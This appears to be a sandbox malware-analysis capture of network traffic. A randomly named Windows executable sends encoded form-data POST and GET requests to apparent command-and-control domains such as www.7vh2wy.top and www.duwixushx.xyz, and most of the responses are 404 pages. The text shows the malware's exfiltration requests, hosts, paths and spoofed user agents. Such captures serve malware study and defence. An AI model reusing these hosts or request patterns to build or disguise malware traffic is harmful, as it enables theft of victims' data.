                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.rafconstrutora.online
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:56:42.065346003 CET1236INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:41 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                Vary: Accept-Encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kRZ6d1xnVR99One%2BLuNtarSbt7v4HAW8CLWticqQmJvnwDuGpL6DPHmNPkEn0wqYWSL0Uwx62zrzxgNEERwprlPCz%2Bze%2FcUOaQa4QrkoJRTULg%2F2qyaLMSjk7VvPmT33SvMLDRaUpbQzJoLT"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e9090296f8e18d0-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1556&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=507&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 39 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d [TRUNCATED]
                                                                Data Ascii: 939<!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title>
                                                                Nov 27, 2024 08:56:42.065392017 CET1236INData Raw: 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20
                                                                Data Ascii: <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"
                                                                Nov 27, 2024 08:56:42.065407038 CET750INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 4f 70 73 2c 3c 2f 73 74 72 6f 6e 67 3e 3c 62 72 3e 4e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 6d 6f 73 3c 62 72 3e 65 73 73 61 20 70 c3 a1 67 69 6e 61 21 3c 2f 68 31 3e 0d 0a 20 20 20
                                                                Data Ascii: <h1><strong>Ops,</strong><br>No encontramos<br>essa pgina!</h1> <p>Parece que a pgina que voc est procurando foi movida ou nunca existiu, certifique-se que digitou o endereo corretamente ou seguiu um link vli


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.65002820.2.249.7804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:56:50.172189951 CET749OUTPOST /n7xy/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.7vh2wy.top
                                                                Origin: http://www.7vh2wy.top
                                                                Referer: http://www.7vh2wy.top/n7xy/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 77 6d 36 68 78 7a 4b 61 65 47 31 38 58 54 68 6d 6c 37 73 58 77 50 4b 5a 4a 34 68 38 49 47 73 47 2b 59 33 6a 67 69 32 4f 76 62 2b 38 4e 67 6c 4b 33 2b 51 34 31 44 55 62 73 58 43 36 44 34 6d 4f 50 74 6b 33 44 4b 43 62 38 30 46 41 63 68 36 6a 6a 72 74 47 2b 2b 4c 43 43 53 58 7a 66 67 46 61 59 30 52 34 61 47 76 77 59 73 34 73 6c 43 69 33 68 74 61 51 4b 30 65 73 70 76 35 4f 4e 56 36 65 62 38 47 37 34 6d 5a 35 2b 6f 43 5a 50 6e 32 35 30 4d 35 71 42 77 2f 78 57 73 6e 72 73 38 77 78 68 36 58 53 2b 6e 41 69 38 31 6f 6b 6c 42 4e 72 43 4d 34 74 63 35 47 73 30 36 62 42 49 76 79 36 63 37 7a 77 6c 42 65 4d 2f 33 54 71
                                                                Data Ascii: 6dr=wm6hxzKaeG18XThml7sXwPKZJ4h8IGsG+Y3jgi2Ovb+8NglK3+Q41DUbsXC6D4mOPtk3DKCb80FAch6jjrtG++LCCSXzfgFaY0R4aGvwYs4slCi3htaQK0espv5ONV6eb8G74mZ5+oCZPn250M5qBw/xWsnrs8wxh6XS+nAi81oklBNrCM4tc5Gs06bBIvy6c7zwlBeM/3Tq
                                                                Nov 27, 2024 08:56:51.774771929 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:56:51 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.65002920.2.249.7804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:56:52.847362041 CET773OUTPOST /n7xy/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.7vh2wy.top
                                                                Origin: http://www.7vh2wy.top
                                                                Referer: http://www.7vh2wy.top/n7xy/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 77 6d 36 68 78 7a 4b 61 65 47 31 38 56 79 78 6d 6d 59 30 58 6e 2f 4b 57 58 6f 68 38 48 6d 73 43 2b 59 72 6a 67 6a 7a 44 75 70 71 38 4e 46 42 4b 74 39 49 34 79 44 55 62 6e 33 43 2f 65 6f 6d 46 50 74 35 43 44 50 36 62 38 30 52 41 63 67 4b 6a 2f 4d 35 5a 2f 75 4c 41 4e 79 58 39 42 51 46 61 59 30 52 34 61 43 50 57 59 76 49 73 6b 79 53 33 67 4d 61 58 55 6b 65 76 67 50 35 4f 61 6c 36 61 62 38 48 65 34 6e 46 66 2b 72 36 5a 50 6a 6d 35 33 64 35 70 49 77 2b 30 62 4d 6d 67 6e 49 39 63 6b 71 62 55 2b 42 51 2b 72 56 67 68 67 33 51 78 65 2f 34 4f 4f 70 6d 75 30 34 44 7a 49 50 79 51 65 37 4c 77 33 57 53 72 77 44 32 4a 4d 35 6e 75 43 30 35 43 48 4f 75 77 4b 59 41 65 6b 37 35 4b 6f 51 3d 3d
                                                                Data Ascii: 6dr=wm6hxzKaeG18VyxmmY0Xn/KWXoh8HmsC+YrjgjzDupq8NFBKt9I4yDUbn3C/eomFPt5CDP6b80RAcgKj/M5Z/uLANyX9BQFaY0R4aCPWYvIskyS3gMaXUkevgP5Oal6ab8He4nFf+r6ZPjm53d5pIw+0bMmgnI9ckqbU+BQ+rVghg3Qxe/4OOpmu04DzIPyQe7Lw3WSrwD2JM5nuC05CHOuwKYAek75KoQ==
                                                                Nov 27, 2024 08:56:54.440880060 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:56:54 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.65003020.2.249.7804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:56:55.554179907 CET1786OUTPOST /n7xy/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.7vh2wy.top
                                                                Origin: http://www.7vh2wy.top
                                                                Referer: http://www.7vh2wy.top/n7xy/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 77 6d 36 68 78 7a 4b 61 65 47 31 38 56 79 78 6d 6d 59 30 58 6e 2f 4b 57 58 6f 68 38 48 6d 73 43 2b 59 72 6a 67 6a 7a 44 75 6f 53 38 4e 58 4a 4b 33 64 30 34 7a 44 55 62 6b 33 43 2b 65 6f 6d 69 50 74 68 47 44 50 2b 74 38 32 70 41 65 47 32 6a 76 39 35 5a 32 75 4c 41 49 43 58 77 66 67 46 50 59 30 42 30 61 47 6a 57 59 76 49 73 6b 77 4b 33 77 74 61 58 57 6b 65 73 70 76 35 43 4e 56 36 2b 62 38 4f 6a 34 6e 78 70 2b 36 61 5a 4d 43 4b 35 34 4f 52 70 48 77 2b 36 63 4d 6e 67 6e 50 31 66 6b 71 47 72 2b 42 4d 59 72 53 51 68 67 52 35 56 47 2b 6f 4b 59 36 4b 4d 73 36 32 5a 46 72 75 2f 65 35 33 62 30 55 57 65 33 41 75 79 4a 64 62 45 4a 46 4d 6f 52 63 6d 59 44 2f 41 4c 6f 59 38 48 36 39 50 4d 6f 30 50 57 41 79 67 45 2b 55 74 43 6e 41 6b 77 76 75 36 77 52 42 6e 53 4d 61 4e 53 65 5a 64 62 6e 69 51 48 63 71 41 79 70 4f 7a 54 54 45 43 61 55 33 55 69 55 6f 73 42 78 43 67 34 72 64 73 61 51 44 45 47 6c 32 54 6c 54 30 51 37 61 62 69 42 4c 2b 6d 66 33 63 49 4d 6b 61 4c 58 61 6a 49 79 55 4b 76 59 44 31 5a 70 37 57 [TRUNCATED]
                                                                Data Ascii: 6dr=wm6hxzKaeG18VyxmmY0Xn/KWXoh8HmsC+YrjgjzDuoS8NXJK3d04zDUbk3C+eomiPthGDP+t82pAeG2jv95Z2uLAICXwfgFPY0B0aGjWYvIskwK3wtaXWkespv5CNV6+b8Oj4nxp+6aZMCK54ORpHw+6cMngnP1fkqGr+BMYrSQhgR5VG+oKY6KMs62ZFru/e53b0UWe3AuyJdbEJFMoRcmYD/ALoY8H69PMo0PWAygE+UtCnAkwvu6wRBnSMaNSeZdbniQHcqAypOzTTECaU3UiUosBxCg4rdsaQDEGl2TlT0Q7abiBL+mf3cIMkaLXajIyUKvYD1Zp7W3emshwuu45LpHtukjy2IxFfFgVsFkXmw4tuOlx+MMdK6otAPr8B6Ux73+No6AS9jS2yfgthWRcVShT0+Ie+ZXd1Zz28L+zbenmfmb2HR5GnIGSmFUha5KuY8b3WexsaZC2/sQjr8YnWry2j69fsXbhGaRLEoyHmIFnM3DHY/5JQk2uroyrXNlJKm9V442sjQe6p6UAtJzOsUbSbAUIs9Hyhcla+ECUabENYP0lpbKoH4eZhXKEeaIDlzSXhJGZ+LjrUpcY6Amd/EAriJB120KWgQCHZhWJaXfTARjHJeAVzmYfynq4dW5FdZ+0Xkwv9KwiEeKwceMp17Hu98D0TIp28uStX7f9pvK2ypK30rigciSjeDEpDA8jLQ+3y3VkR6RT4iYpTPHpoeTZa2Jljma/1m2dpfweZSSTwDeLgsJicu1Ome8iOtyk9IywImiCDC2AHzxQAxc1M8boFqJiSxim42ASGQQ1kqIQMjvk2sNBT9zz9ZGY/LF/lS+olRHCaTHAZdXM6Y98GC0rHQyCf2iWU6xNzlQRPmKA12ky0ZkQlx/fw1L3cIVZWK62ycG9tcD5W/y9/DDR24p5cAs8i7Xdv43C0O9c4SgsuBZQbzwTBZGioNPBj7hzFQO+yyDIcuoaog/lH1Puvni6b+h1Fe+NhFYj3F7hfPH6 [TRUNCATED]
                                                                Nov 27, 2024 08:56:57.113641024 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:56:56 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.65003120.2.249.7804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:56:58.214248896 CET496OUTGET /n7xy/?6dr=9kSByHmOdk8FUTJoiY9dxdy2O5k/Hm0rzNXDmTbYjaiqM3Vah8l/01w+tC+kGtOMFeVLDvKv+EgDTRurueNShPDfBTXGcQl1Rn1iXwPoeM4M+DqRn9nIdXP5s7w9IXv4aM6Qswk=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.7vh2wy.top
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:56:59.823905945 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:56:59 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.650032156.251.17.224804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:57:05.537626028 CET758OUTPOST /q0vk/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.duwixushx.xyz
                                                                Origin: http://www.duwixushx.xyz
                                                                Referer: http://www.duwixushx.xyz/q0vk/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 65 6f 73 56 4b 75 4c 42 65 6b 52 45 4a 58 47 53 2f 43 2b 52 41 6b 73 43 4e 38 34 66 70 35 6d 34 47 48 56 53 38 57 57 76 4c 34 78 48 37 4d 50 4e 58 46 43 4d 64 75 45 5a 47 39 66 32 6b 70 52 4e 37 6e 32 58 63 6e 62 38 4b 31 66 4a 56 69 35 78 48 73 50 70 35 54 72 77 45 6a 59 68 4d 53 79 50 49 48 6c 4e 42 79 53 52 47 64 4b 70 51 44 6b 39 76 46 57 79 6c 76 75 30 51 79 47 4c 6f 71 6c 79 71 64 71 45 42 68 54 67 34 50 52 41 6d 30 35 64 36 4d 70 5a 72 6a 6d 31 6f 69 45 50 76 44 76 33 44 61 65 39 5a 79 4c 4f 33 62 4f 38 4d 5a 6a 53 50 35 46 61 4b 43 68 72 6b 45 4c 42 61 34 59 69 44 77 30 4f 55 42 72 67 74 36 49 4a
                                                                Data Ascii: 6dr=eosVKuLBekREJXGS/C+RAksCN84fp5m4GHVS8WWvL4xH7MPNXFCMduEZG9f2kpRN7n2Xcnb8K1fJVi5xHsPp5TrwEjYhMSyPIHlNBySRGdKpQDk9vFWylvu0QyGLoqlyqdqEBhTg4PRAm05d6MpZrjm1oiEPvDv3Dae9ZyLO3bO8MZjSP5FaKChrkELBa4YiDw0OUBrgt6IJ
                                                                Nov 27, 2024 08:57:07.093499899 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:57:06 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.650033156.251.17.224804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:57:08.217842102 CET782OUTPOST /q0vk/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.duwixushx.xyz
                                                                Origin: http://www.duwixushx.xyz
                                                                Referer: http://www.duwixushx.xyz/q0vk/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 65 6f 73 56 4b 75 4c 42 65 6b 52 45 50 45 4f 53 39 68 47 52 42 45 73 42 49 38 34 66 69 5a 6d 38 47 48 70 53 38 58 53 46 4c 4b 56 48 37 73 2f 4e 57 45 43 4d 65 75 45 5a 4f 64 66 2f 35 35 52 38 37 6e 36 31 63 6d 6e 38 4b 78 33 4a 56 6e 64 78 45 64 50 71 36 6a 72 75 64 7a 59 6a 44 79 79 50 49 48 6c 4e 42 79 47 37 47 63 69 70 51 54 30 39 75 68 43 39 72 50 75 33 47 43 47 4c 2f 36 6b 31 71 64 71 79 42 67 50 4f 34 4e 5a 41 6d 31 70 64 39 59 31 61 38 54 6d 2f 73 69 46 48 70 42 36 51 61 35 50 63 48 54 69 70 75 4c 6d 55 41 50 2b 49 54 4b 46 35 59 53 42 70 6b 47 54 7a 61 59 59 49 42 77 4d 4f 47 57 6e 48 69 4f 74 71 38 50 4a 35 2b 36 51 59 2b 64 59 2b 6f 35 2b 34 64 64 69 67 55 77 3d 3d
                                                                Data Ascii: 6dr=eosVKuLBekREPEOS9hGRBEsBI84fiZm8GHpS8XSFLKVH7s/NWECMeuEZOdf/55R87n61cmn8Kx3JVndxEdPq6jrudzYjDyyPIHlNByG7GcipQT09uhC9rPu3GCGL/6k1qdqyBgPO4NZAm1pd9Y1a8Tm/siFHpB6Qa5PcHTipuLmUAP+ITKF5YSBpkGTzaYYIBwMOGWnHiOtq8PJ5+6QY+dY+o5+4ddigUw==
                                                                Nov 27, 2024 08:57:09.753113985 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:57:09 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.650034156.251.17.224804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:57:10.880908966 CET1795OUTPOST /q0vk/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.duwixushx.xyz
                                                                Origin: http://www.duwixushx.xyz
                                                                Referer: http://www.duwixushx.xyz/q0vk/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
